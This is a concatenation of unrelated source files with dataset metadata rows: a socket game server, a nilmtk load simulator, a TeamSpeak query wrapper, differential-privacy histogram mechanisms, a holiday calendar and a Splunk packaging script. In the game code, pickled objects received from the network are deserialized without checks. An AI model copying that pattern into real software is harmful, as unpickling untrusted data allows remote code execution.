    s.bind((server, port))
except socket.error as e:
    print(str(e))

s.listen(2)
print("Waiting for a connection, Server Started")

bo = Board()
currentId = "b"
connections = 0


def threaded_client(conn):
    global currentId, bo, connections
    variable = bo
    bo.start_user = currentId
    if connections > 2:
        bo.start_user = "s"  # connections beyond the two players get "s"
    data1 = pickle.dumps(variable)
    if currentId == "w":
        bo.ready = True
        bo.startTime = time.time()
    conn.send(data1)
    currentId = bo.start_user = "w"
    connections += 1
    while True:
        try:
            data2 = conn.recv(4096 * 4).decode("utf-8")
            if not data2:
                break
            else:
                # Commands arrive as plain text: "move x y color",
                # "reset", "winner b" or "winner w".
                if data2.count("move") > 0:
                    info = data2.split(" ")
                    x = int(info[1])
                    y = int(info[2])
                    pos = (x, y)
                    color = info[3]
                    bo.addMove(pos, color)
                elif data2 == "reset":
                    bo.__init__()
                elif data2 == "winner b":
                    bo.winner = "b"
                elif data2 == "winner w":
                    bo.winner = "w"
                print("Received", data2)
                if bo.ready:
                    # 900 seconds (15 minutes) per player, minus elapsed time
                    if bo.turn == "w":
                        bo.time1 = 900 - (time.time() - bo.startTime) - bo.storedTime1
                    else:
                        bo.time2 = 900 - (time.time() - bo.startTime) - bo.storedTime2
                sendData = pickle.dumps(bo)
                print("Sending ", bo)
                conn.sendall(sendData)
        except Exception as e:
            print(e)
            break
    connections -= 1
    if connections < 2:
        bo = Board()
        currentId = "w"
    print("Disconnected")
    conn.close()


while True:
    conn, addr = s.accept()
    print("Connected to:", addr)
    start_new_thread(threaded_client, (conn,))
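A minimal, hypothetical client sketch for the protocol above, mirroring the server's pickle-then-text exchange (it assumes the server's Board class is importable so the pickled snapshots can be deserialized):

```python
import pickle
import socket

# Hypothetical client: receive the pickled Board first, then alternate
# sending text commands and receiving updated Board snapshots.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 5556))

board = pickle.loads(sock.recv(4096 * 4))   # initial snapshot
print("joined as", board.start_user)

sock.sendall("move 3 4 w".encode("utf-8"))  # place a white stone at (3, 4)
board = pickle.loads(sock.recv(4096 * 4))   # updated board comes back
sock.close()
```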
| 21.27619 | 86 | 0.499552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.070725 |
| 8b93ff57b731c6c33351b57dd2f1b5402cee9a07 | 72 | py | Python | examples/random_article.py | yusufusta/wikiHowUnofficialAPI | e29ae96a2dcf893f5b587804b9dd37a412cdd561 | ["MIT"] | 5 | 2021-04-17T14:02:58.000Z | 2022-03-06T02:18:16.000Z | examples/random_article.py | yusufusta/wikiHowUnofficialAPI | e29ae96a2dcf893f5b587804b9dd37a412cdd561 | ["MIT"] | 1 | 2021-07-09T12:28:27.000Z | 2021-07-10T10:04:11.000Z | examples/random_article.py | yusufusta/wikiHowUnofficialAPI | e29ae96a2dcf893f5b587804b9dd37a412cdd561 | ["MIT"] | 4 | 2021-02-02T14:23:58.000Z | 2021-11-15T04:38:10.000Z |
import wikihowunofficialapi as wha
ra = wha.random_article()
print(ra)
| 14.4 | 34 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
8b9488221b16161dd9b114f9406bbcd8771818fb
| 11,341
|
py
|
Python
|
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | 3
|
2018-11-09T16:13:32.000Z
|
2019-11-10T20:10:10.000Z
|
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | null | null | null |
nilmtk/simulate/gaussianstatemachines.py
|
BaluJr/energytk
|
e9b06bcb43a40010ccc40a534a7067ee520fb3a7
|
[
"Apache-2.0"
] | 1
|
2018-10-24T10:28:52.000Z
|
2018-10-24T10:28:52.000Z
|
import numpy as np
import pandas as pd
from nilmtk import TimeFrame
import datetime
import matplotlib.pyplot as plt
# transients['active transition'].cumsum().resample('2s', how='ffill').plot()
class GaussianStateMachines(object):
"""
This class is a basic simulator, which creates sample loads by randomizing signatures
of some predefined statemachine appliances.
The randomization is performed by a perfect gaussian distribution, whose stddev can be
defined.
The signatures of all the appliances are superimposed to yield a final load profile.
"""
def simulate(self, output_datastore, appliance_specs = None, duration = 8640000, seed = None):
'''
Performs the simulation of a defined interval of load profile.
The style of the output is heavily linked to the EventbasedCombination
disaggregator.
The target file is filled with submeters for each appliance and a single
site_meter.
Parameters
----------
appliance_specs:
The specification of the appliances. See the default appliances
created in the constructor to have a description of the default
format
target_file: str
The path to the file where the powerflow shall be created.
duration: pd.Timedelta
Circa duration of the created load profile.
Default 100 days
seed: int
            The seed number used within the random generation. This allows
            generating the same load profile multiple times. If kept None, a
            random seed is used.
Returns
-------
transients: pd.DataFrame
The transients of the load profile
steady_states: pd.DataFrame
The steady states of the load profile
'''
np.random.seed(seed=seed)
specs =[[((2000, 20, 15), (20, 6, 10)), ((-2000, 10, 15), (10, 3, 10))], # Heater 1
[((1500, 40, 15), (10, 6, 10)), ((-1500, 10, 15), (10, 2, 10))], # Heater 2
[((130, 10, 90), (10, 5, 30)), ((-130, 10, 300), (10, 6, 50))], # Fridge
[((80, 0, 4*60*60),(10, 0.01, 60*60*2)), ((-80, 0.0, 10),(10, 0.01, 10))], # Lamp
[((40, 0, 50), (6, 2, 10)), ((120, 0, 40), (15, 2, 10)), ((-160, 10, 200), (10, 1, 30))], # Complex1
[((100, 0, 10*60), (10, 0.1, 80)), ((-26, 0, 180), (5, 0.1, 50)), ((-74,5, 480), (15,1,50))], # Complex2
[((320, 0, 60*2), (10, 3, 10)), ((-40, 0, 180), (5, 0.1, 50)), ((-100,5, 480), (15,1,50)), ((-180,5, 480), (15,1,50))]] # Complex3
# Breaks as appearances, break duration in Minutes, stddev
break_spec = [[5, 300, 10], [4, 600, 10], [7, 2*60,10], [1, 60*12, 180], [4, 60, 10], [2, 60, 10], [2, 60*6, 60*60]]
#for i, bs in enumerate(break_spec):
# bs[0] = bs[0]*len(specs[i])
appliance_names = ['Heater1', 'Heater2', 'Fridge', 'Lamp', 'Complex 1', 'Complex 2', "Complex 3"]
# Generate powerflow for each appliance
appliances = []
for i, spec in enumerate(specs):
avg_activation_duration = sum(map(lambda e: e[0][-1], spec))
avg_batch_duration = avg_activation_duration * break_spec[i][0] + (break_spec[i][1]*60)
num_batches = duration // avg_batch_duration
activations_per_batch = break_spec[i][0]
events_per_batch = len(spec) * activations_per_batch
flags = []
for flag_spec in spec:
flags.append(np.random.normal(flag_spec[0], flag_spec[1], (num_batches * activations_per_batch, 3)))
flags = np.hstack(flags)
# Take care that fits exactly to 5
            cumsum = flags[:,:-3:3].cumsum(axis=1)  # assumes 2d; like np.add.accumulate
flags[:,:-3:3][cumsum < 5] += 5 - cumsum[cumsum < 5]
            flags[:,-3] = -flags[:,:-3:3].sum(axis=1)  # assumes 2d
flags = flags.reshape((-1,3))
# Put appliance to the input format
appliance = pd.DataFrame(flags, columns=['active transition', 'spike', 'starts'])
num_batches_exact = len(appliance)//events_per_batch
breaks = np.random.normal(break_spec[i][1],break_spec[i][2], num_batches_exact)
appliance.loc[events_per_batch-1::events_per_batch,'starts'] += (breaks * 60)#num_breaks*break_spec[i][0]
appliance.index = pd.DatetimeIndex(appliance['starts'].clip(lower=5).shift().fillna(i).cumsum()*1e9, tz='utc')
            appliance['ends'] = appliance.index + pd.Timedelta('1s')  # not actually used; must be shorter than the clip
appliance.drop(columns=['starts'], inplace=True)
appliance.loc[appliance['active transition'] < 0, 'signature'] = appliance['active transition'] - appliance['spike']
appliance.loc[appliance['active transition'] >= 0, 'signature'] = appliance['active transition'] + appliance['spike']
appliance['original_appliance'] = i
appliances.append(appliance[:])
# Create the overall powerflow as mixture of single appliances
transients = pd.concat(appliances, verify_integrity = True)
transients = transients.sort_index()
# Write into file
building_path = '/building{}'.format(1)
for appliance in range(len(appliances)):
key = '{}/elec/meter{:d}'.format(building_path, appliance + 2)
data = appliances[appliance]['active transition'].append(pd.Series(0, name='power active', index=appliances[appliance]['active transition'].index - pd.Timedelta('0.5sec')))
data = pd.DataFrame(data.sort_index().cumsum())
data.columns = pd.MultiIndex.from_tuples([('power', 'active')], names=['physical_quantity', 'type'])
output_datastore.append(key, data)
overall = transients['active transition'].append(pd.Series(0, name='power active', index=transients['active transition'].index - pd.Timedelta('0.5sec')))
overall = pd.DataFrame(overall.sort_index().cumsum())
overall.columns = pd.MultiIndex.from_tuples([('power', 'active')], names=['physical_quantity', 'type'])
output_datastore.append('{}/elec/meter{:d}'.format(building_path, 1), overall)
num_meters = len(appliances) + 1
# Write the metadata
timeframe = TimeFrame(start = transients.index[0], end = transients.index[-1])
self._save_metadata_for_disaggregation(output_datastore, timeframe, num_meters, appliance_names)
# The immediate result
steady_states = transients[['active transition']].cumsum().rename(columns={'active transition':'active average'})
steady_states[['active average']] += 60
transients = transients[['active transition', 'spike', 'signature', 'ends']]
return transients, steady_states
def _save_metadata_for_disaggregation(self, output_datastore, timeframe, num_meters, appliancetypes):
"""
Stores the metadata within the storage.
        REMINDER: Originally I wanted to do this differently and also store the
        metadata alongside the data. For time reasons I left it and kept it the
        way it was before.
        This function first checks whether there is already meta-information in
        the file. If yes, it extends it; otherwise it removes it.
Note that `self.MODEL_NAME` needs to be set to a string before
calling this method. For example, we use `self.MODEL_NAME = 'CO'`
for Combinatorial Optimisation.
TODO:`preprocessing_applied` for all meters
TODO: submeter measurement should probably be the mains
measurement we used to train on, not the mains measurement.
Parameters
----------
output_datastore : nilmtk.DataStore subclass object
The datastore to write metadata into.
timeframe : list of nilmtk.TimeFrames or nilmtk.TimeFrameGroup
The TimeFrames over which this data is valid for.
num_meters : [int]
Required if `supervised=False`, Gives for each phase amount of meters
appliancetypes: [str]
The names for the different appliances. Is used in plots and error metric
tables.
"""
# Global metadata
meter_devices = {
'synthetic' : {
'model': "Synth",
'sample_period': 0, # Makes it possible to use special load functionality
'max_sample_period': 1,
'measurements': [{
'physical_quantity': 'power',
'type': 'active'
}]
}}
date_now = datetime.datetime.now().isoformat().split('.')[0]
dataset_metadata = {
'name': "Synthetic Gaussian Statemachine",
'date': date_now,
'meter_devices': meter_devices,
'timeframe': timeframe.to_dict()
}
output_datastore.save_metadata('/', dataset_metadata)
# Building metadata always stored for the new buildings
phase_building = 1
building_path = '/building{}'.format(phase_building)
mains_data_location = building_path + '/elec/meter1'
# Main meter is sum of all single appliances:
elec_meters = {}
elec_meters[1] = {
'device_model': 'synthetic',
'site_meter': True,
'data_location': mains_data_location,
'preprocessing_applied': {}, # TODO
'statistics': {
'timeframe': timeframe.to_dict()
}
}
def update_elec_meters(meter_instance):
elec_meters.update({
meter_instance: {
'device_model': 'synthetic', # self.MODEL_NAME,
'submeter_of': 1,
'data_location': (
'{}/elec/meter{}'.format(
building_path, meter_instance)),
'preprocessing_applied': {}, # TODO
'statistics': {
'timeframe': timeframe.to_dict()
}
}
})
# Appliances and submeters:
appliances = []
# Submeters (Starts at 2 because meter 1 is mains and 0 not existing)
for chan in range(2, num_meters):
update_elec_meters(meter_instance=chan)
appliance = {
'original_name': appliancetypes[chan-2],
'meters': [chan],
'type': appliancetypes[chan-2],
'instance': chan - 1
}
appliances.append(appliance)
building_metadata = {
'instance': (phase_building),
'elec_meters': elec_meters,
'appliances': appliances,
}
output_datastore.save_metadata(building_path, building_metadata)
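A short sketch of driving the simulator above; the output file name is hypothetical, and the HDFDataStore import is assumed from nilmtk's datastore API:

```python
from nilmtk import HDFDataStore

# Hypothetical one-day run; writes a site meter plus one submeter per
# appliance under /building1/elec/ and returns the event-level data.
store = HDFDataStore("synthetic.h5", mode="w")
sim = GaussianStateMachines()
transients, steady_states = sim.simulate(store, duration=86400, seed=42)
store.close()

print(transients.head())     # transitions: active transition, spike, signature, ends
print(steady_states.head())  # cumulative steady-state power per event
```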
| 49.308696 | 184 | 0.571907 | 11,139 | 0.982189 | 0 | 0 | 0 | 0 | 0 | 0 | 4,906 | 0.43259 |
| 8b95a94d3b25a23a56d3d3d661b084a44e828fab | 543 | py | Python | my_gallery/migrations/0006_photos_image.py | Abdihakim-Muhumed/gallery | bfdb58466503bedda6ac4b686afb42b69c055f0c | ["Unlicense"] | null | null | null | my_gallery/migrations/0006_photos_image.py | Abdihakim-Muhumed/gallery | bfdb58466503bedda6ac4b686afb42b69c055f0c | ["Unlicense"] | null | null | null | my_gallery/migrations/0006_photos_image.py | Abdihakim-Muhumed/gallery | bfdb58466503bedda6ac4b686afb42b69c055f0c | ["Unlicense"] | null | null | null |
# Generated by Django 3.1.2 on 2020-10-14 07:15
import cloudinary.models
from django.db import migrations
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('my_gallery', '0005_auto_20201013_0828'),
]
operations = [
migrations.AddField(
model_name='photos',
name='image',
field=cloudinary.models.CloudinaryField(default=django.utils.timezone.now, max_length=255, verbose_name='image'),
preserve_default=False,
),
]
| 24.681818 | 125 | 0.655617 | 404 | 0.744015 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.195212 |
| 8b98b8d35fd76526fa88fe1c8a30101c9a8baac3 | 9,713 | py | Python | bot/ts/ThreadSafeTSConnection.py | Asnanon/ts-gw2-verifyBot | 4da70450bc53631e61a42d18df36f5aef710cdbe | ["MIT"] | null | null | null | bot/ts/ThreadSafeTSConnection.py | Asnanon/ts-gw2-verifyBot | 4da70450bc53631e61a42d18df36f5aef710cdbe | ["MIT"] | null | null | null | bot/ts/ThreadSafeTSConnection.py | Asnanon/ts-gw2-verifyBot | 4da70450bc53631e61a42d18df36f5aef710cdbe | ["MIT"] | null | null | null |
import logging
from threading import RLock
from typing import Callable, Tuple, TypeVar
import schedule
import ts3
from ts3.query import TS3ServerConnection
from bot.config import Config
LOG = logging.getLogger(__name__)
R = TypeVar('R')
def default_exception_handler(ex):
""" prints the trace and returns the exception for further inspection """
LOG.debug("Exception caught in default_exception_handler: ", exc_info=ex)
return ex
def signal_exception_handler(ex):
""" returns the exception without printing it, useful for expected exceptions, signaling that an exception occurred """
return ex
def ignore_exception_handler(ex):
""" acts as if no exception was raised, equivalent to except: pass"""
return None
class ThreadSafeTSConnection:
RETRIES = 3
@property
def uri(self):
return "telnet://%s:%s@%s:%s" % (self._user, self._password, self._host, str(self._port))
def __init__(self, user, password, host, port, keepalive_interval=None, server_id=None, bot_nickname=None):
"""
Creates a new threadsafe TS3 connection.
user: user to connect as
password: password to connect to user with
host: host of TS3 server
port: port for server queries
keepalive_interval: interval in which the keepalive is sent to the ts3 server
server_id: the server id of the TS3 server we want to address, in case we have multiple.
Note that the server id HAS to be selected at some point, using the "use" command.
It has just been wrapped in here to allow for more convenient copying of the
TS3 connection where the appropriate server is selected automatically.
bot_nickname: nickname for the bot. Could be suffixed, see gentleRename. If None is passed,
no naming will take place.
"""
self._user = user
self._password = password
self._host = host
self._port = port
self._keepalive_interval = int(keepalive_interval)
self._server_id = server_id
self._bot_nickname = bot_nickname + '-' + str(id(self))
self.lock = RLock()
self.ts_connection = None # done in init()
self._keepalive_job = None
self.init()
def init(self):
if self.ts_connection is not None:
try:
self.ts_connection.close()
except Exception:
pass # may already be closed, doesn't matter.
self.ts_connection = ts3.query.TS3ServerConnection(self.uri)
# This hack allows using the "quit" command, so the bot does not appear as "timed out" in the Ts3 Client & Server log
        self.ts_connection.COMMAND_SET = set(self.ts_connection.COMMAND_SET)  # create a mutable copy of the frozenset
self.ts_connection.COMMAND_SET.add('quit') # add command
if self._keepalive_interval is not None:
if self._keepalive_job is not None:
schedule.cancel_job(self._keepalive_job) # to avoid accumulating keepalive calls during re-inits
self._keepalive_job = schedule.every(self._keepalive_interval).seconds.do(self.keepalive)
if self._server_id is not None:
self.ts3exec(lambda tc: tc.exec_("use", sid=self._server_id))
if self._bot_nickname is not None:
self.forceRename(self._bot_nickname)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
return None
def keepalive(self):
LOG.info(f"Keepalive Ts Connection {self._bot_nickname}")
self.ts3exec(lambda tc: tc.send_keepalive())
def ts3exec(self,
handler: Callable[[TS3ServerConnection], R],
exception_handler=lambda ex: default_exception_handler(ex)) -> Tuple[R, Exception]: # eh = lambda ex: print(ex)):
"""
        Executes a query() or exec_() on the internal TS3 connection.
handler: a function ts3.query.TS3ServerConnection -> any
exception_handler: a function Exception -> any. None will be interpreted as not having encountered an exception.
The default handler prints the stacktrace for the exception and returns the exception itself.
This changes the workflow of executing erroring code: instead of try-catching we need to
decompose the tuple returned from this function and check if the exception result is anything
but None. E.g.:
try:
res = ts3con.query(...)
except Exception as ex:
# error handling
becomes
res,ex = threadsafe_ts3con.ts3exec(lambda tc: tc.query(...))
if ex:
# error handling
Note that the exception handler is only executed iff an exception is actually
being handled!
returns a tuple with the results of the two handlers (result first, exception result second).
"""
reinit = False
with self.lock:
failed = True
fails = 0
res = None
exres = None
while failed and fails < ThreadSafeTSConnection.RETRIES:
failed = False
try:
res = handler(self.ts_connection)
except ts3.query.TS3TransportError:
failed = True
fails += 1
LOG.error("Critical error on transport level! Attempt %s to restart the connection and send the command again.", str(fails), )
reinit = True
except Exception as ex:
exres = exception_handler(ex)
if reinit:
self.init()
return res, exres
def close(self):
if self._keepalive_job is not None:
schedule.cancel_job(self._keepalive_job)
# This hack allows using the "quit" command, so the bot does not appear as "timed out" in the Ts3 Client & Server log
if self.ts_connection is not None:
self.ts_connection.exec_("quit") # send quit
self.ts_connection.close() # immediately quit
del self.ts_connection
def gentleRename(self, nickname):
"""
Renames self to nickname, but attaches a running counter
to the name if the nickname is already taken.
"""
i = 1
new_nick = "%s(%d)" % (nickname, i)
while not self.ts3exec(lambda tc: tc.query("clientfind", pattern=new_nick).first(), signal_exception_handler)[1]:
i += 1
new_nick = "%s(%d)" % (nickname, i)
new_nick = "%s(%d)" % (nickname, i)
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=new_nick))
self._bot_nickname = new_nick
return self._bot_nickname
def forceRename(self, target_nickname):
"""
Attempts to forcefully rename self.
If the chosen nickname is already taken, the bot will attempt to kick that user.
If that fails the bot will fall back to gentle renaming itself.
"""
whoami_response, _ = self.ts3exec(lambda tc: tc.query("whoami").first())
imposter, error = self.ts3exec(lambda tc: tc.query("clientfind", pattern=target_nickname).first(), signal_exception_handler) # check if nickname is already in use
if whoami_response['client_nickname'] != target_nickname:
if error:
if error.resp.error.get('id') == '512': # no result
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=target_nickname))
LOG.info("Forcefully renamed self to '%s'.", target_nickname)
else:
LOG.error("Error on rename when searching for users", exc_info=error)
else:
if whoami_response['client_id'] != imposter['clid']:
_, ex = self.ts3exec(lambda tc: tc.exec_("clientkick", reasonid=5, reasonmsg="Reserved Nickname", clid=imposter.get("clid")), signal_exception_handler)
if ex:
LOG.warning(
"Renaming self to '%s' after kicking existing user with reserved name failed."
" Warning: this usually only happens for serverquery logins, meaning you are running multiple bots or you"
" are having stale logins from crashed bot instances on your server. Only restarts can solve the latter.",
target_nickname)
else:
LOG.info("Kicked user who was using the reserved registration bot name '%s'.", target_nickname)
target_nickname = self.gentleRename(target_nickname)
LOG.info("Renamed self to '%s'.", target_nickname)
else:
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=target_nickname))
else:
LOG.info("No rename necessary")
self._bot_nickname = target_nickname
return self._bot_nickname
def create_connection(config: Config, nickname: str) -> ThreadSafeTSConnection:
return ThreadSafeTSConnection(config.user, config.passwd,
config.host, config.port,
config.keepalive_interval,
config.server_id,
nickname)
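A brief, hypothetical usage sketch for the wrapper above, decomposing the (result, exception) tuple as the ts3exec docstring describes (credentials and host are made up; in the bot they come from Config via create_connection):

```python
# Hypothetical credentials/host; keepalive every 30s on virtual server 1.
ts3conn = ThreadSafeTSConnection("serveradmin", "secret", "localhost", 10011,
                                 keepalive_interval=30, server_id=1,
                                 bot_nickname="verify-bot")

# Instead of try/except, decompose the (result, exception) tuple.
whoami, ex = ts3conn.ts3exec(lambda tc: tc.query("whoami").first())
if ex:
    print("query failed:", ex)
else:
    print("connected as", whoami["client_nickname"])
ts3conn.close()
```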
| 45.176744 | 171 | 0.601153 | 8,601 | 0.885514 | 0 | 0 | 126 | 0.012972 | 0 | 0 | 4,164 | 0.428704 |
| 8b9915ff298534b2c620ead53ddd94b9a9c59202 | 87 | py | Python | software/reachy/io/__init__.py | pollen-robotics/reachy-2.0 | 1721c2d93737e576e328bfdb78376d1b0163d3d6 | ["Apache-1.1"] | 167 | 2018-02-07T21:42:13.000Z | 2021-03-06T08:25:45.000Z | software/reachy/io/__init__.py | pollen-robotics/reachy-2.0 | 1721c2d93737e576e328bfdb78376d1b0163d3d6 | ["Apache-1.1"] | 39 | 2019-11-27T13:11:59.000Z | 2021-01-12T09:33:26.000Z | software/reachy/io/__init__.py | pollen-robotics/reachy-2.0 | 1721c2d93737e576e328bfdb78376d1b0163d3d6 | ["Apache-1.1"] | 47 | 2018-05-27T02:59:28.000Z | 2021-03-07T14:56:10.000Z |
"""Reachy submodule responsible for low-level IO."""
from .io import IO  # noqa: F401
| 17.4 | 52 | 0.701149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.724138 |
| 8ba05404268d52ee6b9dcf341a6f596fdbe8cb19 | 453 | py | Python | test/unit/test_wrapper.py | Bowowzahoya/cordis_search | 8766717fdd785b2768785b9147e63cac62dfbd43 | ["MIT"] | null | null | null | test/unit/test_wrapper.py | Bowowzahoya/cordis_search | 8766717fdd785b2768785b9147e63cac62dfbd43 | ["MIT"] | null | null | null | test/unit/test_wrapper.py | Bowowzahoya/cordis_search | 8766717fdd785b2768785b9147e63cac62dfbd43 | ["MIT"] | null | null | null |
import pandas as pd
from context import *
from cordis_search import wrapper as wr
TEST_PROJECTS_FILE = pd.read_csv(RESOURCES_FOLDER+"fp7_test_projects.csv", sep=";")
print(TEST_PROJECTS_FILE)
def test_search():
query = "multiculturalism"
selected_projects = wr.search(TEST_PROJECTS_FILE, query)
assert set(selected_projects.index.to_list()) == set([267583, 287711])
def test_summary():
wr.summary(TEST_PROJECTS_FILE)
test_summary()
| 25.166667 | 83 | 0.766004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.09713 |
| 8ba0eaca96c9b2d167fd14d08ba774e477aea1cb | 1,067 | py | Python | dpsniper/mechanisms/noisy_hist.py | barryZZJ/dp-sniper | 71a3fc06f3fc319b023bde9aad8f05b8c5a47a80 | ["MIT"] | 13 | 2021-03-30T15:39:35.000Z | 2022-02-21T08:30:45.000Z | dpsniper/mechanisms/noisy_hist.py | barryZZJ/dp-sniper | 71a3fc06f3fc319b023bde9aad8f05b8c5a47a80 | ["MIT"] | null | null | null | dpsniper/mechanisms/noisy_hist.py | barryZZJ/dp-sniper | 71a3fc06f3fc319b023bde9aad8f05b8c5a47a80 | ["MIT"] | 4 | 2021-06-30T08:37:45.000Z | 2022-03-05T03:21:14.000Z |
import numpy as np
from dpsniper.mechanisms.abstract import Mechanism
class NoisyHist1(Mechanism):
"""
Alg. 9 from:
Zeyu Ding, YuxinWang, GuanhongWang, Danfeng Zhang, and Daniel Kifer. 2018.
Detecting Violations of Differential Privacy. CCS 2018.
"""
def __init__(self, eps: float = 0.1):
self.eps = eps
def m(self, a, n_samples: int = 1):
l = a.shape[0]
v = np.atleast_2d(a)
# each row in m is one sample
m = v + np.random.laplace(scale=1/self.eps, size=(n_samples, l))
return m
class NoisyHist2(Mechanism):
"""
Alg. 10 from:
Zeyu Ding, YuxinWang, GuanhongWang, Danfeng Zhang, and Daniel Kifer. 2018.
Detecting Violations of Differential Privacy. CCS 2018.
"""
def __init__(self, eps: float = 0.1):
self.eps = eps
def m(self, a, n_samples: int = 1):
l = a.shape[0]
v = np.atleast_2d(a)
# each row in m is one sample
m = v + np.random.laplace(scale=self.eps, size=(n_samples, l))
return m
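A short sketch contrasting the two mechanisms above on a hypothetical histogram. NoisyHist1 uses the standard Laplace scale 1/eps, while NoisyHist2 uses scale eps, which in general does not satisfy eps-differential privacy; this kind of correct/incorrect pair is what violation-detection tools test against:

```python
import numpy as np

hist = np.array([10.0, 5.0, 3.0])  # hypothetical histogram query result

m1 = NoisyHist1(eps=0.1)  # Laplace scale 1/eps = 10: standard calibration
m2 = NoisyHist2(eps=0.1)  # Laplace scale eps = 0.1: far too little noise

# Each row of the returned array is one noisy copy of the histogram.
samples1 = m1.m(hist, n_samples=4)
samples2 = m2.m(hist, n_samples=4)
print(samples1.shape, samples2.shape)  # (4, 3) (4, 3)
```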
| 26.02439 | 82 | 0.597938 | 991 | 0.928772 | 0 | 0 | 0 | 0 | 0 | 0 | 409 | 0.383318 |
| 8ba24d39fccf745cf193a9313e6f0347c33e72ba | 1,122 | py | Python | workalendar/europe/georgia.py | macharmi/workalendar | 4f8644484d6ba56c66e4bb82c377aa19eccfc0dc | ["MIT"] | null | null | null | workalendar/europe/georgia.py | macharmi/workalendar | 4f8644484d6ba56c66e4bb82c377aa19eccfc0dc | ["MIT"] | null | null | null | workalendar/europe/georgia.py | macharmi/workalendar | 4f8644484d6ba56c66e4bb82c377aa19eccfc0dc | ["MIT"] | null | null | null |
from ..core import OrthodoxCalendar
from ..registry_tools import iso_register


@iso_register('GE')
class Georgia(OrthodoxCalendar):
    """Country of Georgia

    Sources:
    https://en.wikipedia.org/wiki/Public_holidays_in_Georgia_(country)
    https://www.officeholidays.com/countries/georgia/2021
    """
    include_christmas = False
    include_christmas_eve = False
    include_new_years_day = True
    include_orthodox_christmas = True
    include_epiphany = False
    include_good_friday = True
    include_easter_saturday = True
    include_easter_sunday = True
    include_easter_monday = True

    FIXED_HOLIDAYS = OrthodoxCalendar.FIXED_HOLIDAYS + (
        (1, 2, "Day After New Year"),
        (1, 19, "Orthodox Epiphany"),
        (3, 3, "Mother's Day"),
        (3, 8, "International Women's Day"),
        (4, 9, "Day Of National Unity"),
        (5, 9, "Day Of Victory Over Fascism"),
        (5, 12, "Saint Andrew The First-Called Day"),
        (5, 26, "Independence Day"),
        (8, 28, "Saint Mary's Day"),
        (10, 14, "Day Of Svetitskovloba"),
        (11, 23, "Saint George's Day"),
    )
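A brief sketch of consuming the calendar above, assuming workalendar's usual holidays()/is_working_day() API:

```python
import datetime

from workalendar.europe.georgia import Georgia

cal = Georgia()

# (date, label) pairs combining Orthodox movable feasts and FIXED_HOLIDAYS.
for day, label in cal.holidays(2021):
    print(day, label)

print(cal.is_working_day(datetime.date(2021, 5, 26)))  # False: Independence Day
```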
| 30.324324 | 72 | 0.646168 | 1,021 | 0.909982 | 0 | 0 | 1,041 | 0.927807 | 0 | 0 | 404 | 0.360071 |
| 8ba29d9fb01d60102507bf5db6c09210143677fa | 3,471 | py | Python | release/util/splunkbase_releaser.py | xynazog/amp4e_splunk_events_input | a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b | ["BSD-2-Clause"] | 9 | 2017-07-31T16:13:51.000Z | 2021-01-06T15:02:36.000Z | release/util/splunkbase_releaser.py | xynazog/amp4e_splunk_events_input | a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b | ["BSD-2-Clause"] | 51 | 2017-10-24T17:25:44.000Z | 2022-03-31T16:47:58.000Z | release/util/splunkbase_releaser.py | xynazog/amp4e_splunk_events_input | a5bb57cf82ca3e96fa9a444e5e5e9789eb16b70b | ["BSD-2-Clause"] | 12 | 2017-08-01T08:59:39.000Z | 2021-02-24T21:10:46.000Z |
import os
from distutils.dir_util import copy_tree
from invoke import task, run, Exit
import shutil
class SplunkbaseReleaser:
DIRS_TO_ARCHIVE = ['appserver', 'bin', 'certs', 'default', 'metadata', 'README', 'static']
APP_NAME = 'amp4e_events_input'
PATH_TO_PYTHON_LIBS = '/opt/splunk/lib/python3.7/site-packages'
PYTHON_LIBS_TO_ARCHIVE = ['splunklib', 'pika']
EXCLUDED_FILES = ['local.meta', 'requirements-splunk.txt', '*.pyc', '*.pyo']
SPLUNKBASE_README = 'README_SPLUNKBASE.md'
LICENSE = 'LICENSE'
def __init__(self, app_dir):
        print(app_dir)
self.app_dir = app_dir
@property
def _tmp_dir(self):
return os.path.join('/tmp')
@property
def _tmp_app_dir(self):
return os.path.join(self._tmp_dir, self.APP_NAME)
@property
def _readme_splunkbase_path(self):
return os.path.join(self.app_dir, self.SPLUNKBASE_README)
@property
def _license_path(self):
return os.path.join(self.app_dir, self.LICENSE)
@property
def _excluded_files_arguments(self):
return ' '.join(map(lambda f: "--exclude='{}'".format(f), self.EXCLUDED_FILES))
@property
def _release_file_path(self):
return os.path.join(self.app_dir, 'release', '{}.spl'.format(self.APP_NAME))
def __call__(self):
self.prepare()
self.copy_dirs()
self.copy_python_libs()
self.make_bin_dir_executable()
self.copy_splunk_readme()
self.copy_license()
self.create_archive()
self._remove_tmp_app_dir()
def prepare(self):
self._remove_tmp_app_dir()
self._remove_release_file()
self._create_tmp_app_dir()
def copy_python_libs(self):
for l in self.PYTHON_LIBS_TO_ARCHIVE:
dest_dir = os.path.join(self._tmp_app_dir, 'bin', l)
if os.path.isdir(dest_dir):
                raise Exit('The directory {} already exists and conflicts with a native Python package. '
                           'Please rename or delete it.'.format(dest_dir))
else:
copy_tree(os.path.join(self.PATH_TO_PYTHON_LIBS, l), dest_dir)
def make_bin_dir_executable(self):
for root, dirs, files in os.walk(os.path.join(self._tmp_app_dir, 'bin')):
for f in files:
os.chmod(os.path.join(root, f), 0o755)
for d in dirs:
os.chmod(os.path.join(root, d), 0o755)
def create_archive(self):
print("CREATING FILE")
run("tar -czf {} {} -C {} {}"
.format(self._release_file_path, self._excluded_files_arguments, self._tmp_dir, self.APP_NAME))
def _remove_release_file(self):
